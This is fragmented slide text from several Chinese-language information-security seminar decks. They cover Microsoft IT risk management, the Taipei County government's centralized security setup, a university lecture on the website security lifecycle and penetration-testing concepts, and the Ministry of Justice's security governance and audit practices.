(Defined by Corporate Security) 

High 

9 

依據資產類型進行 

風險分析 




維運原則 

利用錯誤設定、 buffer 

overflows、、檔案共享、 

NetBIOS 進行攻擊 

Host 

Application 

未經授權存取、未檢查的 

記憶體操作 

監聽網路傳輸、 

收集資訊 

Network 

Assets 

Trust 

未管理的信任允許 

Account 

危害帳號的完整性與隱 

私 

10 



風險評估的組成元件 




維運原則 

Asset 

What are you 

trying to 

assess? 

Threat 

What are you 

afraid of 

happening? 

Vulnerability 

How could the 

threat occur? 

Mitigation 

What is 

currently 

reducing the 

risk? 

Impact 

What is the 

impact to the 

business? 

+ 

Probability 

How likely is the 

threat given 

the controls? 

= 

Current Level 

of Risk 

What is the probability that the threat will 

overcome controls to successfully exploit the 

vulnerability and impact the asset? 

11 

風險管理程序項目 

與組織架構 




維運原則 

Corporate Security 

Group 

Prioritize 

Risks 

1 

Security 

Policy 

2 5 

Compliance 

Engineering 

& Operations 

Security 

Sustained 

Solutions & 

Operations 

Initiatives 

3 4 

12 



依據環境排定優先順序 




維運原則 

排序後風險 

Data Center 

用戶端 

不受管理用戶 

端 

RAS 

Mobile 

針對各個環境訂定政 

策與風險緩和措施 

13 

企業風險與解決方案 

企業風險 

解決方案 

未更新的裝置 

軟體更新與管理 

不受管理的裝置 

遠端與移動使用者 

Embody 

Trustworthy 

Computing 

使用 IPSec/802.1X 隔離網路 

驗證遠端使用者 

Single-factor 

驗證 

RAS 與 administrators 使用 

2-factor 

驗證 

保護重要資產 

程式碼保護計畫 

14 



資訊安全技術方向 

主動式基礎架構風險管理透過 : 

Controlled 

Access 

Interior 

Hardening 

Secure 

Key Assets 

Compliance 

Monitoring 

• Automated IdAM 

• Patch Management 

• Secure Source 

• Elevated Access 

• Anti-virus/Anti 

virus/Anti- 

Code Assets 

Control 

spyware 

• Group Policy Objects 

• Application 

• 2-Factor Auth for 

Remote Access 

Software Assurance 

Program 

• PKI and Certs 

• IPSec 

• Secure Remote User 

• Messaging Firewall 

• Secure Wireless 

• Internal Controls 

Testing 

• Attack and 

Penetration 

Testing 

• Application 

Reviews 

15 

Compliance Competency 

Pyramid 

Manage 

Enforce 

Assess State 

Create Policy 

Assess Risk 

Enumerate 

Drive system configuration 

Remove from network/force patch 

Check configuration vs. policy 

Define expected behavior 

Identify threats, quantify, qualify 

Identify network environment 

Executive Sponsorship 

Security is a business priority 

16 



不僅僅是技術而以 … 

人員和程序讓資訊安全得以確保 

資訊安全治理 

事業單位權責劃分 

能見度與管理數據 

高層背書 

原則與標準作業程序 

宣導與教育 

17 

IT 資訊安全組織 

資訊安全小組 

Threat, Risk 

Analysis, and 

Policy 

Assessment 

compliance 

Monitoring, 

intrusion detection, 

incident response 

Shared services 

operations 

Threat & risk 

analysis 

Security 

management 

Monitoring & 

intrusion detection 

Physical & 

remote access 

Policy 

development 

Security 

assessment 

Rapid response 

& resolution 

Certificate 

administration 

Product 

evaluation 

Compliance & 

remediation 

Forensics 

Security 

tools 

Design 

review 

IT 

investigations 

Initiative 

management 

Structure 

standards 

18 



總結 

高資訊安全在一個開放的環境內是可以做 

到的 

我們依靠微軟核心技術來強化資訊安全 

強化資安政策遵循監控與程序 

是人讓以上這些項目能夠發生 

19 

IT Showcase: 

微軟如何進行 IT 管理 

Microsoft IT 部門實務經驗分享 

外部網站 

…TechNet 

內容 http://www.microsoft.com/technet 

technet/ 

itshowcase/ 

Webcasts http://www.microsoft.com/technet 

technet/ 

itsolutions/msit/webcasts.mspx 

…Microsoft Services 

http://www.microsoft.com/itshowcase 

itshowcase/ 

20 




This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. 

21 



規劃集中型資安環境 

經驗分享 

以台北縣政府為例 

報告人 : 台北縣政府資訊中心 

謝翠娟 

95.04.14 

Outline 

‧ 挑戰 

‧ 策略 

‧ 作法 

‧ 討論 

e 化 , 使資安的重要性快速躍升 

1

挑戰 

‧ 資源、人力有限 

‧ 新聞焦點事件 

– 中毒 

– 替代役 

– 工程師 

‧24H 都有客戶上門 .. 

‧ 需求多樣 .. 

e 化門市 vs. 24h 門庭若市 

網站逾 3 萬人次到訪 

挑 

戰 

2

服務不打烊 

縣府的 7-11 

門市 

提供 590 項線上服務項目 (390 

項線上申辦、 59 項線上繳費 ) 

挑 

戰 

BACK 

行政機關 : 多 + 廣 

挑 

戰 

機關學校計 482 個 

↑: 縣府各單位 

☆: 鄉鎮市公所 

●: 其他相關機關 

▲: 學校 

3

資訊管理策略 

策 

略 

資安 

管控 

不中斷 

運作 

教育 

訓練 

集中管理、統籌發展 

客戶 

服務 

主機 

集中 

網路 

集中 

系統 

集中 

資安策略作法 

資產及上網管制 

策 

略 

系統單一登入 

門禁一卡多用 

全縣及附屬機關納入 

VPN 網路 

人事系統整合差勤系統 

防毒集中監控 

.. 管理資訊共同平台 

4

資安作法 

1. 資通安全政策 

2. 資通安全組織 

3. 資產分類及控制 

4. 人員安 5. 實體環 6. 通訊作 

全管理境安全業管理 

8. 存取控制 

9. 業務永續運作管理 

10. 符合性 

7. 系統 

開發維 

護 

1. 資通安全政策 

作 

法 

目標 

1. 確保電子化資料之機密 

性 , 防止非法使用 

2. 確保資訊系統之完整性 

及可用性。 

3. 確保資訊業務永續運 

作。 

範圍 

1. 資產管理 

2. 人員管理 

3. 硬體管理 

4. 軟體管理 

5. 永續運作 

6. 資安稽核 

5

2. 資通安全組織 

作 

法 

‧ 跨局室「資訊安全管理會報」 

‧ 副縣長擔任召集人 

‧ 成員 - 本府各局室主管 

‧ 稽核工作 - 政風室 

‧ 幕僚工作 - 本府資訊中心 

作 

法 

3. 資產分類、管理 

─ 資產管理及上網檢核 

Agent 

自動回報 

軟硬體 

個人電腦軟硬體 

資源管理系統 

機台 

資訊 

( 設備編號 ) 

財產資訊 

設備 

( 機關代碼 + 

財產編號 ) 

財產、組 

織、人員 

異動 

財產系統 

網路安全 

監控系統 

使用網路 

電腦 

關聯 

使用者 

資訊與權限 

NDS 

92-94 年租賃資料 

6

4. 人員安全與管理 

作 

法 

人員管理 

1. 保密切結 

2. 權限角色 

帳號管理 

1. 單一登入 

2. 整合 HR 

教育訓練 

1. 使用者 

2. 管理者 

4.1. 單一登入系統 

外部網路 

DMZ 

內部網路 

NDS 認證 

民眾 / 公務員 

Cache 

ACL 

Portal 

‧ 在家辦公 

iChain 

Proxy 

ACL 

ACL 

差勤系統 

‧ 民眾、員工均採 SSO 

AP 伺服器 

公文系統 

7

5. 實體與環境安全 

作 

法 

集中電腦機房 .. 

門禁管制 

獨立電力 

減震高架地板 

標準機櫃 .. 

錄影系統 

消防系統 

人機分離 

6. 通訊與作業管理 1/2 

工作項目 

簽章電子交換 

作 1. 電子公文交換 

法 

2. 電子聯合服務中心 

入侵防禦系統 

標準程序 

1. 開關機程序 

2. 異地備援啟動 

3. 整合備份程序 

4. 障礙排除手冊 

5. 緊急報修程序 

防毒監控系統 .. 

弱點掃瞄 ( 半年一次 ) 

8

6. 通訊與作業管理 2/2 

作 

法 

項目 

資料備份 

日誌備份 

作業日誌 

加密儲存、異地儲存、4 代資料 

Fully+Incremental 

回存測試 ( 每週 ) 

系統日誌集中備份 ( 使用 Tivoli 自 

動收集 log) 

每月轉錄成光碟 

內容 

儲存於防潮櫃並上鎖 

25 種機房作業表單 

6.1 防毒及入侵偵測集中監控 

Virus Log 

Virus Log 

1 級策略中心 

安控中心 

Virus Log 

Virus Log 

Internet 

DMZ 

SMTP 郵件 

防毒伺服器 

用戶端 


2 級策略中心 

防毒監控平台 

SOC 平台 

報修平台 

Intranet 

Virus Log 

安控中心 


安控中心 


9

作 

法 

項目 

資安納入系 

統規格 

電子交換使 

用憑証 

即時修補系 

統弱點 

即時監控系 

統效能 .. 

7. 系統開發及維護 

內容 

輸入檢查 ( 防止 Sql Injection) 

後門程式檢查 ( 抽驗原始碼 ) 

.. 共通平台 

電子公文交換 

電子聯合服務中心 

定期檢視系統日誌 

模擬系統測試無誤後實施 

主機效能 (Tivoli) 

資料庫效能 (BMC Partrol) 

發現異常警示告警 

網路管理 .. 

7.1 管理平台示意圖 

系統 

系統 

系統登入 

流程作業 

系統登入 

流程作業 

系 

統 

登 

入 

流 

程 

作 

業 

資 

料 

儲 

存 

報 

表 

產 

出 

資料儲存資料儲存 

報表產出報表產出 

現在 

共同平台 

未來 

10

作 

法 

項目 

目錄服務 

密碼管制 

實體隔離 

GSN VPN .. 

廠商遠端連 

線管制 

8. 存取控制 

單一登入、權限管理 

8 碼以上、英數字加特殊符號、6 個月 

更換 

機密敏感資料 ( 如戶地政 ) 

1. 連線機關 ( 外點單位 112 個、公所 29 個 ) 

2. 提高網路傳輸安全性 

3. 節省通訊費用 

內容 

1. 使用前申請經核准後開放 

2. 管制通訊對象 IP 及通訊埠 

8.1 全縣及附屬機關納入 VPN 網路 

11

9. 業務永續運作管理 

作 

法 

緊急通報程序 

- 標準化 

備份異地儲存 .. 

定期演練 

-6 個月一次 

- 機房災害演練 

- 異地備援演練 

單一服務窗口 

9.1 異地備援 

12

10. 符合性 

作 

法 

‧ 軟體合法版權 

‧ 個人資料保護 

– 戶、地政系統實體隔離 

– 調閱個人相關資料須經警察機關 

錄案 

‧ 機房定期稽核 

– 週、月、季、年稽核 

討論 

‧ 集中好 ? 分權好 ? 

‣ 預算、事權的掌握 

‣ 資源 vs. 職責 

‧ 集中 

‣ 預算集中 : 以量制價 ? 預算審核爭取費力 ? 

‣ 工作集中 : 事權、標準統一 ? 責任重、影響廣 ? 

• 心得 

‣ 決策整合度 vs. 主管支持度 

‣ 黑貓 vs. 白貓 

13

簡報完畢 

恭請指教 

14

網站安全與滲透測試 

主講人 : 賴溪松 

崑山科技大學資訊科技學院院長 

國立成功大學電機工程學系特聘教授 

1 

Outline 

• 網站安全簡介 

• 網站生命週期與網站安全防護 

• 滲透測試簡介 

• 網站安全與滲透測試 

• 結論 

2

網站安全簡介 

• 何謂網站 ? 

• 網頁應用程式 (web Application, 提供應用服 

務 ) 

• 伺服器 ( 提供網站服務的軟體 ) 

• 網路 ( 網路基礎建設 ) 

• 何謂網站安全 ? 

• 持續提供應用服務 

• 避免不當存取 

3 

網站常見的威脅 

• 網頁被竄改 

• 影響架站的組織聲譽 

• 入侵主機 

• Web Application Vulnerabilities 

• 資料被盜 

• 影響架站的組織聲譽 

• 影響架站的組織客戶隱私 

• SQL injection 

• Web Application Vulnerabilities 

4

潛在的資料外洩威脅 

• Search Engine 

• Google 

• Yahoo 

• MSN 

• Internal Search Engine 

• Web page search engine 

• Eg., htdig , google desktop. 

利用 google, 輕鬆找到密碼 

5 

網頁應用系統安全防護 

• 縱深防護的考量 

• 網路安全防護 

• 提供持續性的服務 

• 網路基礎建設安全 (ex: Router, DNS ..etc.,) 

• 伺服器安全防護 

• 作業系統 

• 應用程式安全防護 

• 軟體或套件的安全 

• 應用程式的安全 

6

網頁應用系統 (N-tier) 

應用程式安全 

網路安全 

7 

伺服器安全 

Web 安全 

• 不同層級的安 

全。建構與堆 

積出 Web 安全 

性。 

• 任一環節都可 

能影響其安全 

性。 

8

網站生命週期進行安全考量 

9 

網站設計階段 

• 目的 

• 定義目標 

• 需求分析 

• 功能 

• 安全 

• 設計與實施 

網站設計 

階段 

網站實作 

階段 

網站生命週期 

網站測試 

階段 

營運與維護 

階段 

• 使用哪種語言 ( 實作語言的安全考量 ) 

• 採用哪種 Web 系統 (Web 軟體安全考量 ) 

關閉消滅 

階段 

10

網站設計階段 - 安全考量 (1) 

• 網頁及 web application 

• 評估使用的網頁技術技巧 ,ex:ASP,JSP..etc., 

• 所採用的 web application 具有的安全弱點分析及改 

進。 

• 各類模組與連接資料庫的安全設定準則 . 

• 網頁伺服器 

• 評估站台主機所使用的應用軟體之安全性 

11 

網站設計階段 - 安全考量 (2) 

• 主機 

• 評估站台主機作業系統的安全性 

• 評估站台主機其他應用程式的安全性 

• 網路 

• 對外連線的安全性 

• 頻寬是否充足 

12

網站實作階段 

• 應用層 

• 網頁應用程式發展安全準則。 

• 資料流程安全性準則。 

• 系統層 

• 網站伺服軟體安全設定準則。 

• 站台伺服軟體修補與更新。 

• 主機層 

• 站台主機安全設定。 

• 站台主機軟體修補與更新。 

• 網路層 

• 建立連接及備援能力。 

• 建立容錯機制。 

13 

網站測試階段 

• 目的 

• 測試網站的功能性是否符合需求 

• 測試網站的穩定性 

• 保證程序運作的正確性 

• 連接的正確性 ( 資料庫 , 網站 ,Domain name et.,) 

• 瀏覽正常 


網站設計 

階段 

網站實作 

階段 

網站測試 

階段 


階段 

關閉消滅 

階段 

14

網站測試階段 - 安全考量 (1) 


• SQL Injection test 

• Web Application Security test 

• Backup test 


• Web Server configuration security test 

• Web Server application weakness test 

15 

網站測試階段 - 安全考量 (2) 

• 主機 

• Host weakness test 

• Host configuration Security test 

• 網路 

• Connection backup test 

• Fault-Tolerance test 

• 滲透測試 

• 外部滲透及安全度測試 

16

什麼是滲透測試 ? 

• 經由一連串的活動 , 進行評估組織資通 

安全的弱點。 

• 設計的安全弱點與漏洞 

• 潛在的安全弱點與漏洞 

• 又稱為 “ethical hacking” 。 

• 滲透測試者須具有駭客的技術、高道德 

標準及富創造力的。 

17 

滲透測試類型 

• Black Box Penetration Testing 

• 測試前不提供組織相關的任何資訊 

• 模擬真實世界的駭客手法 

• White Box Penetration Testing 

• 測試前提供重要的組織相關的資訊 

• 模擬駭客已知許多內部的資訊 ( 測試安全政 

策 ) 

• 模擬內部惡意使用者 

18

測試方法及標準 

• OSSTMM(The Open Source Security Testing 

Methodology Manual) 

• 資訊安全 (Information Security) 

• 程序安全 (Process Security) 

• 網路技術安全 (Internet technology Security) 

• 通訊安全 (Communication Security) 

• 無線安全 (Wireless Security) 

• 實體安全 (Physical Security) 

• OWASP(The Open Web Application Security 

Project ) 

• 針對網路應用程式安全的開放原始碼社群專案 

• 發展協助保護網站安全的軟體工具及相關參考文件 

19 

為什麼需要滲透測試 ? 

• 定義威脅組織資訊資產安全的因素 

• 找出潛在的安全威脅 

• 提供資訊安全評估 

• 幫助評估面臨的風險 

• 減少資訊安全成本 

• 將錢花在刀口上 

• 避免事後的處理成本 

• 確保階段性的安全策略或投資成效 

20

由公正第三方進行滲透測試 

• 資安委外 

• 廠商負責導入 

• 同時亦負責檢測與部分的稽核 

• 建置與檢測為同一方 

• 可能不被採信 

• 掩蓋問題 

• 潛在的安全問題不易測得 

• 由公正第三方進行 

• 非打擊資安委外廠商 

• 協助共同提升組織資訊安全 

21 

滲透測試帶來的效益 ! 

• 評估與了解組織面臨的風險 

• 安全現狀 

• 潛在安全弱點與風險 

• 對於資安成本效益 

• 確認投入的資安成本確實效益 

• 未來的資安投資決策 

22

營運與維護階段 

• 目的 

• 網頁上線運作 

• 維護網頁資料更新 

• 持續提供營運與服務 

23 

營運與維護階段 - 安全考量 (1) 


• 測試可能的安全弱點 

• 修正可能的安全弱點 

• Eg: SQL Injection, new attack…etc., 

• 備援機制 


• 保持應用系統的更新 

• 檢視與分析日誌記錄 


24

營運與維護階段 - 安全考量 (2) 

• 主機 

• 保持應用系統的更新 

• 檢視與分析日誌記錄 


• 網路 

• 其他網路安全設備 . Ex:Firewall, IDS 


• 持續維護網站運作安全 

• 稽核 

• 外部的滲透測試 

25 

消滅關閉階段 - 安全考量 (1) 

• 目的 

• 結束網站 

• 更換新的網頁應用程式 

• 封存或銷毀敏感性資料與機密資料 


網站設計 

階段 

網站實作 

階段 

網站測試 

階段 


階段 

關閉消滅 

階段 

26

消滅關閉階段 

• 封存或銷毀敏感性資料與機密資料 

• 硬碟資料須經消磁或 wipe 

• 依特定的處理銷毀程序進行之 

27 

網站的安全機制 

• 資料的保護 

• 應用系統內的資料 

• 組織內部資料 

• 客戶敏感或機密性資料 

• 利用管理來達成每一階段的網站安全 

• Check List 

• 管理程序與稽核程序 

28

開發者與系統安全防護者的角色 

與責任 

• 網頁應用系統管理者 

• 系統的生命週期管理 

• 網頁應用系統開發者 

• 開發系統與實作網頁應用系統的安全 

• 主機系統管理者 

• 維持主機系統的安全及運作正常 

• 網路管理者 

• 維持網路的安全及運作正常 

29 

結論 

• 依網站生命週期來看網站在每一時期的 

安全需求及該如何適當地定義安全的管 

理程序與實行的方法。 

• 資料與資訊是網站的重要標的 , 適當的 

方法能夠有效維護這些公開資訊的安 

全。 

• 再測試與稽核是持續維護網站安全的必 

要條件。 

30

Q&A 

31

資訊處 

法務部資安工作經驗分享 

報告人 : 資訊處處長陳泉錫 

日期 :95 年 4 月 14 日 

1 

簡報大綱 

資訊處 

壹、法務部業務特性 

貳、法務部資訊管理基本策略 

參、設備 / 網路環境 

肆、人員安全管理及教育訓練 

伍、資安組織 

陸、資產分類與控制 

柒、制度 / 法規 

捌、稽核 

玖、檢討 

拾、結語 

2

資訊處 

壹、法務部業務特性 ( 一 ) 

組織 : 

• 法務部本部 293 人。 

• 檢察機關 28 個 ,4523 人。 

• 矯正機關 49 個 ,6938 人。 

• 行政執行署 ( 處 )13 個 ,676 人。 

• 調查局 / 處 / 組等 ,2743 人。 

• 政風 ( 非直轄屬員額 ) 約 3000 人。 

• 法醫研究所、司法官訓練所、矯正人員訓練所。 

• 本部所轄全部機關計 94 個 , 總員額 ( 不含調查局 ) 

12430 人。 

3 

資訊處 

壹、法務部業務特性 ( 二 ) 

所屬機關資訊組織設置 : 

• 本部 : 資訊室 (30 人 ) 

• 檢察機關 : 設資訊室。 

• 矯正機關 : 未設 , 小部分有資訊人員 , 餘由統 

計人員兼。 

• 行政執行機關 : 各執行處未設 , 統計人員兼。 

• 資訊人員合計 :112 人。 

• 資訊人力比 :112/12430=0.90% 

4

3Com 

貳、法務部資訊管理基本策略 

資訊處 

• 中央集權制 

軟硬體 

網路 

資安制度 

• 地方機關 

執行 

5 

各地高分檢 

最高檢 

台高檢 

台北地檢 

參、設備 / 網路環境 ( 一 ) 

法務部 

光纖 

單一窗口 

查詢系統 

T3 

資訊處 

Internet 

(GSN) 

ADSL 

2M/512 

T3 

ADSL 

2M/512 

北部地區 

一審檢察 

行政執行 

T3 

2M 專線 

DNS 

Mail 

Web 

ADSL VPN 

骨幹網路 

ADSL 

2M/512 

ADSL 

2M/512 

ADSL 

2M/512 

中部地區 

一審檢察 

行政執行 

2M 專線 

2M 專線 

專線 VPN 

骨幹網路 

2M 專線 

512K 專線 

各矯正機關 

南部地區 

一審檢察 

行政執行 

調查局 

更生保護會 

司法官訓練所 

電 

金門地檢 

連江地檢 

6

資訊處 

參、設備 / 網路環境 ( 二 ) 

• 全國機關建置成單一 VPN, 使用單一進出閘 

門 : 防火牆、入侵偵測、垃圾郵件過濾、防毒 

牆。 

• 主動式防毒機制。 

• 定期弱點掃描。 

• SYSTEM LOG 的處理 (OP 第一線、SP 第二線 )。 

• N-SOC 的協助 (DMZ 區及內網出口 )。 

7 

資訊處 

參、設備 / 網路環境 ( 三 ) 

• 網路示意圖 POT 

• 納入 Honey 之架構圖 

8

資訊處 

肆、人員安全管理及教育訓練 ( 一 ) 

資訊系統安全之威脅 : 

Threat from Environment : 15%-17% 

Threat from People :83%-85% 

•Internal People :70%-80% 

•External People :3%-15% 

Source :Datapro Report 1995 

9 

肆、人員安全管理及教育訓練 ( 二 ) 

資訊處 

在職人員資訊安全警覺性教育 

• 每年舉辦三至四次資安警覺性教育 , 並由人事 

處協助管制受訓時數。 

10

資訊處 

肆、人員安全管理及教育訓練 ( 三 ) 

新進人員資訊安全教育訓練 : 

• 由人事處提供本處製作之新進人員資訊系統簡介 

光碟 , 協助新進同仁了解本部所使用之資訊系統 

及資訊安全政策。 

11 

資訊處 

肆、人員安全管理及教育訓練 ( 四 ) 

12

資訊處 

肆、人員安全管理及教育訓練 ( 五 ) 

13 

資訊處 

肆、人員安全管理及教育訓練 ( 六 ) 

替代役男資訊安全教育訓練 : 

• 對於所有分發至本部及所屬機關之替代役 

男 , 於職前為其舉辦 2 小時資訓安全教育訓 

練。 

14

資訊處 

肆、人員安全管理及教育訓練 ( 七 ) 

委外人員 : 與公司之合約 , 再分個別 

• 法務部電腦主機房系統操作管理人員 (OP) 考評 

制度 

• 保密切結及資安守則 

• 設備攜入之管控 

15 

資訊處 

16

資訊處 

肆、人員安全管理及教育訓練 ( 八 ) 

• 訓練資訊處人員 

強化資安攻防技巧基本能力 PM4:00-7:00 

全部人員共同研討合約及保密切結應訂定 

之內容 

• 所屬機關首長 

本部統一調訓 

• 所屬機關資訊人員 

本部統一調訓 

17 

資訊處 

伍、資安組織 ( 一 ) 

• 部本部 

• 「法務部資通安全會報」 

• 為本部資通安全最高督導組織 , 由次長擔任召集人、資訊處 

處長擔任執行秘書、各單位主管擔任委員 , 下設 : 

• 「法務部資通安全處理小組」: 

• 由資訊處處長擔任召集人 , 負責推動、協調及督導資訊安全 

管理事項 , 並負責資訊安全危機事項之通報及應變事宜 , 及 

本會報相關幕僚作業。 

18

資訊處 

伍、資安組織 ( 二 ) 

• 法務部資訊安全稽核小組 

• 召集人 : 資訊處處長 , 成員 : 檢察司、矯正司、政風司等相 

關司、處人員及資訊處各科負責人 

• 所屬機關 

• 資訊安全執行小組 

• 召集人 : 機關副首長 , 成員 : 各科室主主管 , 

資訊兼辦人員 

19 

資訊處 

陸、資產分類與控制 ( 一 ) 

資訊資產只要與民眾之個人資料有關當視 

為重要資料 , 皆須嚴格管理。 

以資訊回復需求之急迫性 , 影響之範圍大 

小區分其應變之先後順序及保護之嚴謹程 

度。 

以各別應用系統進行風險評鑑。 

20

資訊處 

21 

資訊處 

陸、資產分類與控制 ( 二 ) 

顏色管理 

• 白色標籤 : 

第三類一般服務伺服主機 

• 藍色標籤 : 

第二類對內重要服務伺服主機 

• 黃色標籤 : 

第一類對外重要服務伺服主機 

保護及回復方式之區隔 

• 核心資料庫 - 刑案主機 ,HOT STANDBY, 異地備份。 

• 重要檔案 -SAN, 異地備份。 

• 次要檔案 - 異地備份。 

22

資訊處 

柒、制度 / 法規 ( 一 ) 

• 國外資安管理法規 : 

US: 

• Information Technology Management Reform Act 

(ITMRA)(Clinger cohen ACT,1996) 

§ 5123 (6), 

§ 5125 CIO Function and official 

designated 

• Federal Information Security Management Act 

(FISMA) 

23 

資訊處 

柒、制度 / 法規 ( 二 ) 

• 國內資安管理法規 

法律 / 命令 : 

• 直接相關法律 - 無 

• 間接相關 : 政府機密保護法、電腦個人資料保護法、刑法等 

行政規則 : 

• 行政院及所屬各機關資訊安全管理要點 

• 行政院及所屬各機關資訊安全管理規範 

• 各機關處理資通安全事件危機通報緊急應變作業注意事項 

• ․․ 

法務部資訊安全行政規則體系表 

24

‣ 法務部資訊安全行政規則體系表 

* 行政院及所屬各機關資訊安 

全管理要點 

* 行政院所屬各機關資訊安全 

管理規範 

* 國家資通訊基礎建設安全機 

制計畫 

* 各機關處理資通安全事件危 

機通報緊急應變作業注意事 

項 

* 各政府機關 ( 構 ) 落實資安 

事件危機處理具體執行方案 

* 法務部資通安全會報 

* 法務部及所屬各機關資 

訊安全管理計畫 

* 法務部及所屬機關資通 

安全事件緊急應變計畫 

暨作業處理程序 

* 法務部資通安全處 

理小組 

* 法務部所屬各機關 

資訊安全執行小組 

* 法務部資訊安全稽 

核小組 

* 法務部外部稽核 

小組 ( 任務編組 ) 

* 法務部內部稽核 

小組 ( 任務編組 ) 

資產分類與控制 

* 法務部暨所屬機關資訊設備登錄注意事項 

* 政府所屬各級行政機關電腦軟體管理作業 

要點 

* 法務部資訊軟硬體設備購案驗收程序注意 

事項 

人員安全 

* 法務部及所屬機關資訊訓練作業規範 

* 法務部電腦主機房系統操作管理人員 (OP) 

考評制度 

* 法務部資訊處聘用暨約僱人員考核要點 

* 保密切結書 

* 法務部暨所屬機關資訊安全作業基本認知 

實體與環境安全 

* 法務部電腦機房管理作業規範 

* 法務部受理廠商或訪客進入辦公場所注意 

事項 ( 草案 ) 

通訊與作業管理 

* 法務部及所屬機關網路使用管理要點 

* 法務部暨所屬機關電子郵件使用管理規範 

( 草案 ) 

* 法務部及所屬機關網站設置作業規範 

* 法務部全球資訊網資料維護更新注意事項 

* 全國法規電腦處理作業規範 

存取控制 

* 法務部所屬各級檢察署使用識別碼及密碼 

查詢部內網路資料作業注意事項 

* 法務部行政執行署暨所屬機關使用識別碼 

及密碼查詢部內網路資料作業注意事項 

* 法務部調查局使用識別碼及密碼查詢部內 

網路資料作業注意事項 

* 法務部所屬各監院所校使用識別碼及密碼 

查詢部內網路資料作業注意事項 

* 法務部所屬矯正機關遠距接見要點 

* 臺灣臺北地方法院檢察署檢察官遠距訊問 

試辦作業要點 

* 法院刑事遠距訊問擴大作業要點 

* 金融帳戶開戶查詢系統使用管理要點 

系統開發及維護 

* 法務部資訊處程式館管理注意事項 

* 法務部資訊系統文件代號之制定及編碼原 

則 

* 法務部資訊系統代號之制定及編碼原則 

營運持續管理 

* 法務部電腦主機房停 ( 斷 ) 電處理程序 

* 法務部資訊處資訊系統回復作業計畫 

資訊安全稽核 

* 法務部及所屬機關資訊安全稽核作業規定 

* 資通安全自我檢查表 

*「法務部及所屬各機關資訊安全作業」評 

分表 

* 法務部及所屬各機關資訊安全作業檢查表 

標準作業程序 

* 軟硬體保管單之標準作業管控 

程序 


* 法務部電腦教室申請使用程序 

及管理注意事項 


* 法務部電腦機房標準作業程序 

* 法務部資訊處測試區設備使用 

申請程序 

使用表單 

* 檢察機關資料查詢單 

* 矯正機關資料查詢單 

* 行政執行機關資料查詢單 

* 調查機關資料查詢單 

* 調查機關電話查詢單 

* 單一窗口資料查詢單 


* 法務部資訊系統委外服務 

標準作業程序 ( 草案 ) 

* 法務部資訊系統維運標準 

作業程序 ( 草案 ) 

* 法務部資訊系統推廣服務 


* 法務部資訊系統問題反應 


資訊處 

使用表單 

* 法務部電腦教室使用申請表 

* 法務部電腦教室使用情形彙 

整表 

保密切結書 

* 法務部資訊設備及媒體檔案 

攜出申請書 

* 法務部資訊處網路服務申請 

單 

* 法務部電子郵件暨目錄服務 

帳號申請單 

使用表單 

機房管理作業規範 

* 法務部資訊處機房工作日誌 

* 法務部資訊處機房出入登記 

表 

* 法務部資訊處機房物品出入 

登記表 

* 法務部資訊處放行條 

* 法務部資訊處機房作業需求 

委託申請單 

* 法務部資訊處系統備份作業 

申請單 

* 進入機房作業申請單 

* 法務部資訊處網路服務單 

* 法務部資訊處機房問題處理 

單 

* 法務部資訊處專線問題處理 

表 

* 機房設備密碼表拆閱申請單 

機房標準作業程序 

* 入侵偵測系統記錄檢核表 

* 法務部防毒及誘捕主機系統 

檢視記錄 

* 法務部資訊安全通告 

* 技術服務中心警示系統報告 

檢視記錄 

* 法務部 NSOC 問題單處理報 

告 

* 法務部資訊處媒體遞送清單 

測 

試區使用申請 

* 法務部資訊處使用測試區出 

入登記表 

* 法務部資訊處測試區設備使 

用申請單 

25 

捌、稽核 ( 一 ) 

資訊處 

• 目的 : 

整體資安作為成效之檢驗。 

強化資安政策推動之效果。 

依據 : 

• 法務部及所屬機關資訊安全稽核作業規定。 

組織 : 

• 法務部資訊安全稽核小組 , 資訊處處長擔任召集人 , 成員 

由檢察、矯正、政風等代表組成。 

26

資訊處 

捌、稽核 ( 二 ) 

• 施行方式 : 

資安外部稽核作業 

• 書面查核 ( 全面 ) 

• 實地查核 ( 每年擇定 5-6 個所屬機關 ) 

資安內部稽核作業 ( 法務部各司處 ) 

定期 / 不定期 

資訊處內部的資安內控機制 

27 

資訊處 

玖、檢討 

• 資訊系統管理的分權不足 - 程式撰寫人 

員、系統 ( 資料管理人員的區隔 )。 

• 系統負責人對於系統技術細節漸無法掌 

握 , 主控性不足 

• 設備 ( 系統 ) 之 PATCH 無法全數更到最新 

版 

• 尚未建置異地備援機房 

28

資訊處 

拾、結語 

• 資安工作貴在實踐 , 管理面尤應重 

於技術面。 

• 雖然不盡美善 , 但我們追求在有限 

資源下作最大的努力。 

29 

資訊處 

簡報完畢 

敬請指教 

30

活動資料 - 資通安全研發中心- 國立成功大學

Create successful ePaper yourself

Delete template?

Save as template?